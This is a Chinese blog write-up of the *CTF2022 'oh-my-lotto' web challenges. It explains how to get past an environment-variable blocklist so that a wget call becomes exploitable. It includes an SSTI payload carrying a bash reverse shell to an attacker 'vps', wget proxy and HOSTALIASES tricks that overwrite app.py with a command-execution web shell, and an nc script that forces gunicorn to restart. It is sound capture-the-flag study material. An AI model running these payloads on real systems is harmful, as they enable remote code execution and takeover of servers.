*CTF2022 oh-my-lotto&revenge

最新推荐文章于 2023-03-20 19:55:50 发布
最新推荐文章于 2023-03-20 19:55:50 发布
阅读量460 收藏
点赞数 4
分类专栏: 比赛wp 文章标签: Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/124286911
版权

*CTF2022 oh-my-lotto&revenge

文章目录

简单分析下源码

题目给了附件,主要看app,lotto,docker-compose.yml

在这里插入图片描述

这里是开了两个容器,然后通过links进行交互,app可以通过links将lotto容器的ip记录到该容器中, 再通过连接 lotto:80 可以访问lotto容器(因为lotto在80端口上)
这个在之后的wget中很有用
在这里插入图片描述

lotto

我们先看lotto

from flask import Flask, make_response
import secrets

app = Flask(__name__)
#在80端口有个服务,我们访问就会生成一个txt,然后将文件返回
@app.route("/")
def index():
    lotto = []
    for i in range(1, 20):
        n = str(secrets.randbelow(40))
        lotto.append(n)
    
    r = '\n'.join(lotto)
    response = make_response(r)
    response.headers['Content-Type'] = 'text/plain'
    response.headers['Content-Disposition'] = 'attachment; filename=lotto_result.txt'
    return response

if __name__ == "__main__":
    app.run(debug=True, host='0.0.0.0', port=80)

app

看结构
在这里插入图片描述

  1. safe_check是一个方法,会检测一些恶意利用环境变量的命令
    在这里插入图片描述

  2. /index返回index.html

  3. /result会将/app/lotto_result.txt中的值进行返回

  4. /forecast路由可以上传文件,并且存储到/app/guess/forecast.txt

  5. /lotto路由处,接收两个参数,然后将lotto_key转大写,对lotto_key进行检测,当检测无问题之后,通过os.environ将两个参数分别作为key和value仍进环境变量

在这里插入图片描述

然后接下来,通过wget去访问lotto,这个前面也分析了,因为两个容器都是在一个机子上,所以也就是相当于去127.0.0.1:80去请求一个新生成的随机数文件

os.system('wget --content-disposition -N lotto')

在这里插入图片描述

非预期解

修改PATH变量

wget运行的时候,会去环境变量里找wget,但是如果我们把PATH修改了,那么wget就会出错,就不会生成新的/app/lotto_result.txt

这样我们先拿到/app/lotto_result.txt,然后将PATH修改掉,然后我们拿到的上一次的结果,访问/lotto,wget出问题,不会生成新的/app/lotto_result.txt,达成预测值和靶机里的文件相同,得flag

本地复现的时候,确实成功把PATH环境变量给打了,然后生成不了新的/app/lotto_result.txt,但是我们上传一个和/app/lotto_result.txt相同的文件,还是不能得到flag

我甚至去和容器交互,然后查看两个文件下的内容

在这里插入图片描述

从表面上看是一样的,但是还是有些区别

这里我们用附件中的脚本,简单修改下,生成txt

from flask import Flask, make_response
import secrets

app = Flask(__name__)
#在80端口有个服务,我们访问就会生成一个txt,然后将文件返回
@app.route("/")
def index():
    str2 = '26 14 2 15 10 31 1 29 15 1 3 17 21 28 8 5 13 26 12'
    str1 = str2.split(" ")
    lotto = []
    for i in str1:
        # n = str(secrets.randbelow(40))
        n = str(i)
        lotto.append(n)

    
    r = '\n'.join(lotto)
    response = make_response(r)
    response.headers['Content-Type'] = 'text/plain'
    response.headers['Content-Disposition'] = 'attachment; filename=lotto_result.txt'
    return response

if __name__ == "__main__":
    app.run(debug=True, host='0.0.0.0', port=80)

我们来看这个我自己在windows下手写的txt和脚本生成的文件的区别
在这里插入图片描述

这个可能是因为windows和linux下回车换行的含义不同引起的(如果说的有问题,请大佬指点)
在这里插入图片描述

上传文件之后,进入/lotto,然后输入

path
/tmp

回显结果
在这里插入图片描述

WGETRC

思路一:用http_proxy,在vps上整个服务,让wget去vps上下载上一次的结果,所以会判定相同

思路二:
参考y4师傅的wp
看文档
在这里插入图片描述

有两个很神奇的变量:
http_proxy:代理,每次wget会先访问我们这个代理
output_document:控制返回文件的目录

所以可以根据这两个参数,做一个代理,让wget去访问我们的vps,然后返回index.html打SSTI

首先将变量传进app/gusss/forecast.txt
1.txt,将1.txt上传

http_proxy=http://vps:7005
output_document=templates/index.html

vps上整个服务,用来将反弹shell的语句返回给index.html

from flask import Flask

app = Flask(__name__)

@app.route("/")
def index():
    a = '''{{config.__class__.__init__.__globals__['os'].popen('/bin/bash -c "bash -i >& /dev/tcp/vps/7010 0>&1"').read()}}'''
    return a

if __name__ == "__main__":
    app.run(debug=True,host='0.0.0.0', port=7005)

传参

在这里插入图片描述

代理得到请求,将反弹shell返回
在这里插入图片描述

在vps上监听7010端口
在这里插入图片描述

预期解

官方wp

根据源码中app.py所述逻辑,当上传的forecast.txt文件内容与lotto_result.txt文件内容相符时,可以获得flag,lotto容器中生成lotto_result.txt使用的是secrets库,该库函数使用安全的随机数生成方法,理论上不存在被预测的风险。

发现在进行lotto猜测的时候可以运行输入一次环境变量,该环境变量会被传递给os.system('wget --content-disposition -N lotto'),同时环境变量会经过safe_check函数检查

def safe_check(s):
    if 'LD' in s or 'HTTP' in s or 'BASH' in s or 'ENV' in s or 'PROXY' in s or 'PS' in s:
        return False
    return True

一些常见的环境变量利用方法都已经被禁止,通过翻阅Linux环境变量文档http://www.scratchbox.org/documentation/general/tutorials/glibcenv.html在Network Settings中发现有HOSTALIASES可以设置shell的hosts加载文件,利用/forecast路由可以上传待加载的hosts文件,将wget --content-disposition -N lotto发向lotto的请求转发到自己的域名

例如如下hosts文件

# hosts
lotto www.sk1y.com

同时注意到wget请求添加了--content-disposition -N参数,说明请求的保存文件名将由服务方提供方指定的文件名决定,并可以覆盖原有的文件,那我们在自己的www.sk1y.top域名的80端口提供一个文件下载的功能,将返回文件名设置为app.py就可以覆盖当前题目的app.py文件

首先上传hosts文件,然后将HOSTALIASES设置为/app/guess/forecast.txt
在这里插入图片描述
查看app.py,发现app.py已经被覆盖了
在这里插入图片描述

服务端参考POC

from flask import Flask, request, make_response
import mimetypes

app = Flask(__name__)

@app.route("/")
def index():

    r = '''
from flask import Flask,request
import os


app = Flask(__name__)
@app.route("/test", methods=['GET'])
def test():
    a = request.args.get('a')
    a = os.popen(a)
    a = a.read()
    return str(a)

if __name__ == "__main__":
    app.run(debug=True,host='0.0.0.0', port=8080)
'''
    response = make_response(r)
    response.headers['Content-Type'] = 'text/plain'
    response.headers['Content-Disposition'] = 'attachment; filename=app.py'
    return response

if __name__ == "__main__":
    app.run(debug=True,host='0.0.0.0', port=80)

此时发现已经覆盖了题目的app.py,但并不能直接RCE,因为题目使用gunicorn部署,app.py在改变的情况下并不会实时加载。但gunicorn使用一种pre-forked worker的机制,当某一个worker超时以后,就会让gunicorn重启该worker,让worker超时的POC如下
exploit.sh文件如下:

timeout 50 nc 192.168.43.145 8880 &
timeout 50 nc 192.168.43.145 8880 &
timeout 50 nc 192.168.43.145 8880

运行

给可执行权限
chmod +x exploit.sh
然后运行
./exploit.sh

过一会儿,再访问,发现app.py重新加载了
在这里插入图片描述

然后传参test/?a=env,得到flag

在这里插入图片描述

参考链接

  1. 官方wp
  2. y4师傅的wp
  3. wget参考文档
Sk1y
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[*CTF2022]oh_my_lotto_revenge
Huamang的博客
04-21 2876
New 相对于oh_my_lotto,revenge进行了下面的更改 这么做,我们能走的就只有RCE了,而这里唯一能操作的一个地方就是这里,可以操作环境变量 os.environ[lotto_key] = lotto_value 这里有几个非预期解,先看看预期解 Intented writeup 这里可以操控环境变量,那么我们能做的事情就很多了,预期解是操控HOSTALIASES修改hosts 因为他的wget是通过域名下载的 os.system('wget --content-disposition
oh-my-lotto
shinygod的博客
04-22 657
知识点:改变环境变量绕过wget md5爆破 import hashlib for i in range(1000000000): a = hashlib.md5(str(i).encode('utf-8')).hexdigest() if a[0:6] == '0c5fbf': print(i) print(a) 关键是三个路由。 result路由,返回一个他给定的值,也就是我们要预测的值。 @app.route("/result", methods
【*CTF/starctf oh-my-lotto-revenge复盘】
weixin_45751765的博客
05-03 1208
0x00 前言 回来复盘一下多种解法 oh-my-lotto 预期解 HOSTALIASES可以设置shell的hosts加载文件 http://www.scratchbox.org/documentation/general/tutorials/glibcenv.html -N, --timestamping don't re-retrieve files unless newer than 可对本地文件进行覆盖 brain.md 1.forecast上传待加载文件,将s
ctfshow虎山行+虎山行revenge
羽的博客
01-24 1287
代码审计在mc-admin/page-edit.php中存在任意文件包含漏洞 盲猜file=../../../../../../../flag去读flag得到提示地址 访问ctfshowsecretfilehh得到源码如下 <?php highlight_file(__FILE__); error_reporting(0); include('waf.php'); class Ctfshow{ public $ctfer = 'shower'; public function __
CTF入门题目web响应头的获取
shallon686的博客
09-24 460
http://172.22.2.211:8005/这是目标网站 首先打开,目的是获取响应头文件 首先通过网页的审查元素查看网页源代码 也是很皮,用描述语句迷惑性十足 废话不多说直接找响应头文件,刷新下网页得到Flag FLAG:WYE{Really_check_in} ...
实验吧ctf-加了料的报错注入(HTTP响应拆分漏洞)
烟敛寒林的博客
04-25 624
解题链接: http://ctf5.shiyanbar.com/web/baocuo/index.php 根据页面提示,我们需要用post方式传入username和password。 尝试输入username=1'&password=1',报错: 也就是说,单引号没有被吃掉。 而后,在页面源代码中发现tip: 输入username='or '1&a...
CTFHUB-HTTP-响应包源代码
qq_53755216的博客
01-22 384
呃。。。反正查看一下源代码就找到旗子了。。。是不是有点。。。
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 1028
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客大挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb
CTF入门之Web后台
最新发布
m0_55017965的博客
03-20 243
思路:抓包,得到response的包,看上面的cookie提示,再解密得到明文密码,通过明文密码构造数据包发送,得到flag。
详解 CTF Web 中的快速反弹 POST 请求
小水池
08-11 8400
目录 0x00 前言 0x01 Python Requests 安装并导入 requests 模块 发送 GET 请求与 POST 请求 查看请求头 查看响应头 查看响应内容 传递 GET 请求参数 传递 POST 请求参数 传递 Cookie 参数 会话对象 Session() 0x02 writeups 【实验吧 CTFWeb —— 天下武功唯快不破 【Bugk...
CTF web总结
热门推荐
giantbranch的专栏
04-09 8万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/50959166 本文根据自己的做题经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我 仅作为自己的笔记及刚入门的童鞋,大牛勿喷 基础篇   1.直接查看源代码   http:/...
CTFHUB HTTP请求方式
孙轶扬
04-02 7101
#题目重述 使用 CTF**B 方式请求获得 flag。 #解题思路 ##思路一 使用 JavaScript 创建XMLHttpRequest()对象,再用open()和send()方法发送"CTFHUB"请求方法。 这种方法会遇到跨域访问限制的问题,目前对于跨域还是知识忙点,尝试了很多次都无法解决。 ##思路二 这种方法是从网上查来的,使用 Windows 自带的cmd命令行中的 curl命...
CTF web入门——HTTP头相关的----修改请求头、伪造Cookie类题目——Bugku Web题目详细题解
日熙的博客
07-25 6万+
题目一:Bugku 程序员本地网站 1.打开题目显示如下: 题目二:Bugku 管理员系统 题目三:XCTF xff_referer
Hitcon2017 babyfirst-revenge复现
0verWatch的博客
09-06 2825
前言 开学了还是得学习的,复现一波题目来玩玩,其实是实力不够不能去打网鼎杯emmm 正文 先从Hitcon2017 babyfirst-revenge这一个题目,总结一下还是学到很多东西的 复现地址 https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge 这是题目回...
命令注入突破长度限制 | 从CTF题目讲起
纸房子
12-03 7093
在命令注入中往往会存在注入命令的长度过短的情况,无法将全部命令完全的输入进去,这种情况下就需要我们来想办法突破系统命令长度的限制。我们从三道CTF题目来讲解一下这种渗透策略。一.BabyfirstSovled: 33 / 969 Difficulty: ★★ Tag: WhiteBox, PHP, Command InjectionIdeaUse NewLine to bypass regula
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode)
mcmuyanga的博客
03-15 3737
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
MRCTF2020 web Ezpop_Revenge 简单记录
a3320315的博客
03-31 3014
题目介绍 首先这是一个typecho的框架 然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~ 解题过程 首先我们找到输入点 在插件中,我们发现action()的代码 这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~ Helper::addRoute("page_admin_action","/page_a...
2022 star*CTF-Writeup
qq_45603443的博客
04-18 3640
2022 star*CTF-Writeup
2019 CTF题目下载及Write-up解析
CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx 本文档主要是关于CTF安全大赛的题目下载和write up,涵盖了多个题目和解题步骤。 **CTF安全大赛** CTF(Capture The Flag)是指在网络安全领域中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值